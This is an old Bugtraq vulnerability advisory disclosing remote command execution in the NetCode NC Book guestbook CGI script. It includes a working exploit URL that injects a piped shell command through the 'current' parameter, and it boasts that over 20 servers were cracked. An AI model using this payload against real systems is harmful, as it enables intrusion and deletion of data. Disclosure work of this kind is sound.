From: Hannibal Lector <digitalseed@poizonb0x.org> To: bugtraq@securityfocus.com Subject: NetCode NC Book 0.2b remote command execution vulnerability Date: 13 Aug 2001 19:14:38 -0000 * more than 20 servers were successfly cracked using this 'little' hole * ------[ PoizonB0x Advisory#6 pb0x-06-08-2001 ]--------- -NAME: NetCode NC Book 0.2b remote command execution vulnerability. -DESCRIPTION: NetCode's GuestBook. Find more info about it here: http://netcode.lgg.ru/vault/ncbook/ -PROBLEM: A pretty big hole in the main script of that guestbook leads to command execution on the remote server running this vulnerable perl script. -EXPLOIT: ex.: http://target/cgi-bin/ncbook/book.cgi? action=default¤t=|ls - la/|&form_tid=996604045&prev=main.html&list_mess age_index=10 !The above line if given will output the file contents of the kernel dir. Also you can execute any commands (ls, cat, rm etc) -AUTHORs: Discovery: digitalseed and ksenor Advisory: digitalseed -DISCLAIMER: PoizonB0x may not be held liable for the use or potential effects of these programs or advisories, nor the content contained within. Use them at your own risk. -COPYRIGHT: PoizonB0x Crew - www.poizonb0x.org (c) 2000-2001 L...Future Security...l ------[ PoizonB0x Advisory#1 pb0x-06-08-2001 ]---------